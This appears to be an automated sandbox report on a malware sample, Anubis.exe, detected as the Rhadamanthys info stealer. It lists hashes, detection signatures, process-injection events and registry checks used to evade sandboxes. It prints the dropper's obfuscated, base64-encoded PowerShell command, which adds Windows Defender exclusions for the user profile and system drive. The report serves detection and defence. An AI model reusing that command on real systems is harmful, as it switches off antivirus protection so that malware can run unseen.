Analysis
-
max time kernel
92s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-08-2024 13:48
Static task
static1
Behavioral task
behavioral1
Sample
Anubis.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Anubis.exe
Resource
win11-20240802-en
Behavioral task
behavioral3
Sample
spooferconfig.dll
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
spooferconfig.dll
Resource
win11-20240802-en
General
-
Target
Anubis.exe
-
Size
1.2MB
-
MD5
c2adb7ff42f1c961035f17bad5bee12d
-
SHA1
e2ae36539f9ff88e8a89d750e99d15ea6e84f0dc
-
SHA256
4b350ae0b85aa7f7818e37e3f02397cd3667af8d62eb3132fb3297bd96a0abe2
-
SHA512
16413f90689cfa3fc509637bea54634ead1bba7f89d621bbc8096279f2413cd3477142a63becfa457e5756583c34049699ab1e960d1133dad2f72e3325ecb348
-
SSDEEP
24576:uDDgbYd14JwD00GR/L4Sgh5ovGpuIGPBgyjhgQJ8L/inWS:gcbILXoO3p9GP6ydk/inWS
Malware Config
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3156-50-0x00000000022F0000-0x00000000026F0000-memory.dmp family_rhadamanthys behavioral2/memory/3156-52-0x00000000022F0000-0x00000000026F0000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Executes dropped EXE 2 IoCs
Processes:
Launcher.exeWindowsHost.exepid Process 4520 Launcher.exe 3156 WindowsHost.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Anubis.exepowershell.exeWindowsHost.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anubis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsHost.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
WindowsHost.exedescription ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WindowsHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 WindowsHost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID WindowsHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WindowsHost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WindowsHost.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeWindowsHost.exepid Process 1656 powershell.exe 1656 powershell.exe 3156 WindowsHost.exe 3156 WindowsHost.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeWindowsHost.exedescription pid Process Token: SeDebugPrivilege 1656 powershell.exe Token: SeShutdownPrivilege 3156 WindowsHost.exe Token: SeCreatePagefilePrivilege 3156 WindowsHost.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
Anubis.exeLauncher.exedescription pid Process procid_target PID 3748 wrote to memory of 1656 3748 Anubis.exe 78 PID 3748 wrote to memory of 1656 3748 Anubis.exe 78 PID 3748 wrote to memory of 1656 3748 Anubis.exe 78 PID 3748 wrote to memory of 4520 3748 Anubis.exe 80 PID 3748 wrote to memory of 4520 3748 Anubis.exe 80 PID 3748 wrote to memory of 3156 3748 Anubis.exe 82 PID 3748 wrote to memory of 3156 3748 Anubis.exe 82 PID 3748 wrote to memory of 3156 3748 Anubis.exe 82 PID 4520 wrote to memory of 3584 4520 Launcher.exe 83 PID 4520 wrote to memory of 3584 4520 Launcher.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anubis.exe"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
748KB
MD5a8db312e9364d1d82600bf5a398212fe
SHA13bbacada2b463bb9f62ed7ae34a8e8440bc91dcb
SHA25684e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb
SHA512a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782
-
Filesize
456KB
MD5515a0c8be21a5ba836e5687fc2d73333
SHA1c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA2569950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA5124e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82